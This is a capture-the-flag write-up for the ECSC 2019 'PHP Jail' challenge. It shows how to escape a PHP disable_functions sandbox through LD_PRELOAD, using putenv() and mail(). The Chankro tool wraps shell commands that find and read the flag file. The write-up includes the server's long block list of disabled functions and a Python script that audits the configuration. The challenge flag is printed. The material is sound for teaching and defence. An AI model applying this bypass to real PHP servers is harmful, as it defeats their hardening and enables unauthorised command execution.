ECSC 2019 - PHP Jail

description: Can you escape this PHP jail and find the flag file present on the system?

category: misc - 288


The challenge gives us a command to interact with the service: nc challenges.ecsc-teamfrance.fr 4002.

# nc challenges.ecsc-teamfrance.fr 4002

    /// PHP JAIL ////

    There's a file named flag on this filesystem.
    Find it.
    Read it.
    Flag it.


Enter your command: 
Too slow!
Bye!

We can type a PHP command and it will be executed. Let's look at the phpinfo() output (I deleted the useless lines):

# python -c "print 'phpinfo();'" | nc challenges.ecsc-teamfrance.fr 4002
[...]
disable_functions => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir => system, exec, shell_exec, passthru, show_source, popen, proc_open, fopen_with_path, dbmopen, dbase_open, move_uploaded_file, chdir, mkdir, rmdir, rename, filepro, filepro_rowcount, filepro_retrieve, posix_mkfifo, fopen, fread, file_get_contents, readfile, opendir, readdir, scandir, glob, file, dir, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix_getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, virtual, openlog, closelog, ini_set, ini_restore, ignore_user_abort, link, pcntl_alarm, pcntl_exec, pcntl_fork, pcntl_get_last_error, pcntl_getpriority, pcntl_setpriority, pcntl_signal, pcntl_signal_dispatch, pcntl_sigprocmask, pcntl_sigtimedwait, pcntl_sigwaitinfo, pcntl_strerror, pcntl_wait, pcntl_waitpid, pcntl_wexitstatus, pcntl_wifexited, pcntl_wifsignaled, pcntl_wifstopped, pcntl_wstopsig, pcntl_wtermsig, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, is_dir
[...]

Of course we can't use system(), shell_exec(), etc.

But mail() and putenv() are still enabled, so we can execute a command through LD_PRELOAD: mail() calls execve() to spawn the sendmail binary, and a shared object whose path we set with putenv("LD_PRELOAD=...") gets loaded into that new process, outside the reach of disable_functions.
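From the defender's side, the gap this relies on is that putenv() and mail() were left out of disable_functions. The following Python script is an added example, not part of the original write-up or of Chankro: it parses the disable_functions line from a phpinfo() dump (a constructed, abbreviated sample is embedded) and reports whether the environment-setter plus sendmail-spawner combination is still callable and which names to add to the list.

```python
"""Audit a PHP disable_functions value for the gap used in this write-up."""
import re

# putenv() lets a script set LD_PRELOAD for any child process PHP spawns.
ENV_SETTERS = {"putenv"}
# Commonly cited functions that execve() the sendmail binary.
SPAWNERS = {"mail", "mb_send_mail", "imap_mail", "error_log"}
# dl() loads a native extension directly (only on SAPIs where it exists).
LOADERS = {"dl"}


def parse_disable_functions(phpinfo_text: str) -> set[str]:
    """Return the disabled function names from a phpinfo() dump.

    Handles the CLI format `disable_functions => local => master` and
    keeps only the local value (the one in effect for the running script).
    """
    m = re.search(r"^disable_functions\s*=>\s*(.*)$", phpinfo_text, re.M)
    if not m:
        return set()
    local_value = m.group(1).split(" => ")[0]
    return {f.strip().lower() for f in local_value.split(",") if f.strip()}


def audit(disabled: set[str]) -> dict:
    """Report which bypass-relevant functions are still callable."""
    open_spawners = sorted(SPAWNERS - disabled)
    open_env = sorted(ENV_SETTERS - disabled)
    open_loaders = sorted(LOADERS - disabled)
    return {
        # One spawner plus putenv() is enough for the LD_PRELOAD trick.
        "ld_preload_bypass_possible": bool(open_spawners and open_env),
        "open_spawners": open_spawners,
        "open_env_setters": open_env,
        "open_loaders": open_loaders,
        "recommend_disabling": sorted(
            set(open_spawners) | set(open_env) | set(open_loaders)),
    }


# Constructed sample, abbreviated from the write-up's phpinfo() output.
SAMPLE = (
    "disable_functions => system, exec, shell_exec, passthru, popen, "
    "proc_open, fopen, file_get_contents, readfile, scandir, glob, "
    "pcntl_exec, ftp_exec, is_dir => system, exec, shell_exec, passthru, "
    "popen, proc_open, fopen, file_get_contents, readfile, scandir, glob, "
    "pcntl_exec, ftp_exec, is_dir\n"
)

if __name__ == "__main__":
    for key, value in audit(parse_disable_functions(SAMPLE)).items():
        print(f"{key}: {value}")
```

On the write-up's configuration the report flags the bypass as possible and recommends adding putenv, mail, mb_send_mail, imap_mail, error_log and dl to the list.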

To understand it clearly, you can read this post.

So we will use this GitHub tool, Chankro:

# cat rev.sh
#!/bin/sh

find / -name flag
# python chankro.py --arch 64 --input rev.sh --output chan.php --path /tmp


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: chan.php


[+] File created!

Then I modify the file so the payload is stored on one line (the line must end with a \n, otherwise the command won't be executed), and we send it using nc:

# cat chan.php | nc challenges.ecsc-teamfrance.fr 4002

    /// PHP JAIL ////

    There's a file named flag on this filesystem.
    Find it.
    Read it.
    Flag it.


Enter your command: /home/user0/.sensitive/randomdir/flag
/usr/local/lib/python2.7/dist-packages/pwnlib/flag

Bye!

Nice, all we have to do is change rev.sh, regenerate the chan.php file and send it to the server:

# cat rev.sh
#!/bin/sh

cat /home/user0/.sensitive/randomdir/flag


# python chankro.py --arch 64 --input rev.sh --output chan.php --path /tmp


     -=[ Chankro ]=-
    -={ @TheXC3LL }=-


[+] Binary file: rev.sh
[+] Architecture: x64
[+] Final PHP: chan.php


[+] File created!


// Modify chan.php so the payload is stored on one line and ends with '\n'


# cat chan.php | nc challenges.ecsc-teamfrance.fr 4002

    /// PHP JAIL ////

    There's a file named flag on this filesystem.
    Find it.
    Read it.
    Flag it.


Enter your command: ECSC{22b1843abfd76008ce3683e583c66e85c6bbdc65}

Bye!

The flag is ECSC{22b1843abfd76008ce3683e583c66e85c6bbdc65}